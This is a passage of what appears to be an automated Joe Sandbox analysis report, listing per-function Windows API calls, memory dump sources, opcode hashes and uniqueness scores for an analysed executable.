                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: b3176fda82d70814cb5976e1b2195fecada8b94da29c8bb5b1461649693b04ee
                                                                                                                                          • Instruction ID: 967ae87d866f9c46c1e792b8db904a7605aeec9cbf031f18a02f4c062c08cf99
                                                                                                                                          • Opcode Fuzzy Hash: b3176fda82d70814cb5976e1b2195fecada8b94da29c8bb5b1461649693b04ee
                                                                                                                                          • Instruction Fuzzy Hash: E401A5339005A8AFCF11ABA9CC819DEB776FF88740F014129E916B7113DB348D01C6A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 0010B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00109813,00000001,00000364,?,001040EF,?,?,00121098), ref: 0010B177
                                                                                                                                          • _free.LIBCMT ref: 0010C4E5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                          • Instruction ID: 9790e20d356dda63e4b0d4dd4f68e0f48474c3df242f57f35a3fc4caf69da018
                                                                                                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                          • Instruction Fuzzy Hash: 1F01D6722043056BE3318F69988596AFBE9FB95370F25061DE5D4832C1EB70A905CB64
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00109813,00000001,00000364,?,001040EF,?,?,00121098), ref: 0010B177
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                          • Opcode ID: 8eea78984848851f8e9500cacd0b5f4d7d85e0b000ada434343113a9f4dab18f
                                                                                                                                          • Instruction ID: ee6190bfcf7bb9d4ec4985376e04c5f5b29d0f3ea6fb49eee3b1c10b554d8c44
                                                                                                                                          • Opcode Fuzzy Hash: 8eea78984848851f8e9500cacd0b5f4d7d85e0b000ada434343113a9f4dab18f
                                                                                                                                          • Instruction Fuzzy Hash: 21F0E93260D124B7DB255A21BC65B9F3748AF51B70B198211FC98971D0CBF0DD0182E4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00103C3F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                          • Opcode ID: 03eeae023560c276979f5e9f84374af4b5c8842876c056070152b82db4f74a50
                                                                                                                                          • Instruction ID: 4b27aba44fb19b3452170e7c08f9c2bd1f0700a208b51f22add92be8afa9c5a3
                                                                                                                                          • Opcode Fuzzy Hash: 03eeae023560c276979f5e9f84374af4b5c8842876c056070152b82db4f74a50
                                                                                                                                          • Instruction Fuzzy Hash: DCF0EC362002169FDF158E68ED0099A779DFF05B617144126FA65E71D0DF71DA60C790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                          • Opcode ID: a3ecc72fcaa2897d90a5f44b570a90470ab6ce7e90cbb919f5e0ec3513b02da7
                                                                                                                                          • Instruction ID: 5309f87b0c3e4d51821f7c2e2a39adf3604691730147f8306604513115417cec
                                                                                                                                          • Opcode Fuzzy Hash: a3ecc72fcaa2897d90a5f44b570a90470ab6ce7e90cbb919f5e0ec3513b02da7
                                                                                                                                          • Instruction Fuzzy Hash: 13E0ED3120E2255AEA752629DC04B9B36989B523B0F160120BCD8970D1CFE0CD0082E4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E5AC2
                                                                                                                                            • Part of subcall function 000EB505: __EH_prolog.LIBCMT ref: 000EB50A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: ba6a1cdf825f6448e56244c6f4367d3f7928ae5b5e4f4f032eced3b8efc4c858
                                                                                                                                          • Instruction ID: 4d4cff026c25674db47f43ceed6b0f99cf42ee9b1228b086877c3452fa61d6d9
                                                                                                                                          • Opcode Fuzzy Hash: ba6a1cdf825f6448e56244c6f4367d3f7928ae5b5e4f4f032eced3b8efc4c858
                                                                                                                                          • Instruction Fuzzy Hash: FA018C308106D8DED725E7B8C0517EEFBA49F64304F50848DA556A3783CBB41B08E7A2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,000E95D6,?,?,?,?,?,00112641,000000FF), ref: 000E963B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                          • Opcode ID: 821a90e151258664bee4559069f5111728ed4d0614deb4cc1c9e49cf3024f5f4
                                                                                                                                          • Instruction ID: e9529442e715a7347c64be44b13a72719191dbf879ce9af27ee162ab722e11ff
                                                                                                                                          • Opcode Fuzzy Hash: 821a90e151258664bee4559069f5111728ed4d0614deb4cc1c9e49cf3024f5f4
                                                                                                                                          • Instruction Fuzzy Hash: 57F08970481B95AFDB308B25D55879277E86B12321F045B1FD0F6529E1D761658D8A40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                          • Opcode ID: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
                                                                                                                                          • Instruction ID: 2ddcf31ec784b0464c04086ee4d70a4cdc2e9e103c10b3d89e3ce64f65bb796f
                                                                                                                                          • Opcode Fuzzy Hash: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
                                                                                                                                          • Instruction Fuzzy Hash: A0E0D8712002913CD221523A1C01FFB9ADCCFAA724F14813FB1E9E61C2D6D0698442F5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6C4
                                                                                                                                            • Part of subcall function 000EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6F2
                                                                                                                                            • Part of subcall function 000EA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6FE
                                                                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000EA598
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1464966427-0
                                                                                                                                          • Opcode ID: 3f361d2ffb6bd2433799f7dbe2cff64a7eaf75a0327db8622ea1814ec05e17c0
                                                                                                                                          • Instruction ID: 6b278addf3b0d147f66b16f44a9821e2754e910970ed502e86388dd69e4b5d8d
                                                                                                                                          • Opcode Fuzzy Hash: 3f361d2ffb6bd2433799f7dbe2cff64a7eaf75a0327db8622ea1814ec05e17c0
                                                                                                                                          • Instruction Fuzzy Hash: 0AF05E320087D0AECA6257B98904BCBBBD06F1F331F148A4DF1FD72196C27560949B23
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 000F0E3D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExecutionStateThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2211380416-0
                                                                                                                                          • Opcode ID: f14edb3b8783d172e04a6cea2b8b5ce2da9021804644bd404d46c0d7e8ade431
                                                                                                                                          • Instruction ID: 3b984951b0387fa9cfcf0c6e19dc74318fa8144a8dd7e59be7fb55edfd762c86
                                                                                                                                          • Opcode Fuzzy Hash: f14edb3b8783d172e04a6cea2b8b5ce2da9021804644bd404d46c0d7e8ade431
                                                                                                                                          • Instruction Fuzzy Hash: E7D0C211A01098EADB21732939197FE2A4B8FE6310F0C0065B24967A87CB450882B261
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 000FA62C
                                                                                                                                            • Part of subcall function 000FA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000FA3DA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1915507550-0
                                                                                                                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                          • Instruction ID: c9b90d76bf703e589d47a2e80f6c8a9cb03f8b3546353a326e08e7318388a776
                                                                                                                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                          • Instruction Fuzzy Hash: 60D0C7B531020DB6DF41AB61CC129BF7995EB45340F048125BE45D5552EAB1D910B562
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,000F1B3E), ref: 000FDD92
                                                                                                                                            • Part of subcall function 000FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
                                                                                                                                            • Part of subcall function 000FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
                                                                                                                                            • Part of subcall function 000FB568: IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
                                                                                                                                            • Part of subcall function 000FB568: TranslateMessage.USER32(?), ref: 000FB5AC
                                                                                                                                            • Part of subcall function 000FB568: DispatchMessageW.USER32(?), ref: 000FB5B6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 897784432-0
                                                                                                                                          • Opcode ID: 1f9616dfd64adc0591cd1a15338175792baa6445322a769da5be483bfea82ca4
                                                                                                                                          • Instruction ID: af6ed7e6565acb442eba4e0a7a5308dd8134a49f7c43d16ace78992b903d3243
                                                                                                                                          • Opcode Fuzzy Hash: 1f9616dfd64adc0591cd1a15338175792baa6445322a769da5be483bfea82ca4
                                                                                                                                          • Instruction Fuzzy Hash: DBD09E31144300BBD6112B51DD06F1A7AA2AB98F04F404554B384744B2C6729D71EF11
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • DloadProtectSection.DELAYIMP ref: 000FE5E3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DloadProtectSection
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2203082970-0
                                                                                                                                          • Opcode ID: 6c8d5cb5f3d508e247d54f8315ccee07065774e8f7b389ae29a5438f58ba8592
                                                                                                                                          • Instruction ID: 1d0d5eaf253aaccfdf6fbfc80cf6513b7e0cca663e7822da03d22638c8c8b967
                                                                                                                                          • Opcode Fuzzy Hash: 6c8d5cb5f3d508e247d54f8315ccee07065774e8f7b389ae29a5438f58ba8592
                                                                                                                                          • Instruction Fuzzy Hash: 94D0A9B40C03C8AAC301FBA8DC867B83290B320BA4F900001B308C6CB2CB6041C0E601
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetFileType.KERNELBASE(000000FF,000E97BE), ref: 000E98C8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileType
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3081899298-0
                                                                                                                                          • Opcode ID: 9d6ee85a13f2ac184bb1107bc8cb25461a66895fb773542e1a9d2e1d6f20c2cb
                                                                                                                                          • Instruction ID: 0e55b7d5a7b24c1cc472e083d1f8229a9981e214e43df74dae25b8420d2e85bb
                                                                                                                                          • Opcode Fuzzy Hash: 9d6ee85a13f2ac184bb1107bc8cb25461a66895fb773542e1a9d2e1d6f20c2cb
                                                                                                                                          • Instruction Fuzzy Hash: DFC012344041458D8E6446269A440D9B391AB933657B48694D028950F1C722CC87EA11
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                          • Opcode ID: 88e4cc5bd9843c942ac854cb006e0641b2f83eb1c428bea43cb0f46f68ea8b00
                                                                                                                                          • Instruction ID: da9265297d158c67b6725a774b42e5fe85c5c5b7465ef8d9ccabb4e3b8661ab8
                                                                                                                                          • Opcode Fuzzy Hash: 88e4cc5bd9843c942ac854cb006e0641b2f83eb1c428bea43cb0f46f68ea8b00
                                                                                                                                          • Instruction Fuzzy Hash: B9D0C971410212CFD7A48F29E404781BBE0AF08311B21887E90D9D2524E6708880CF40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
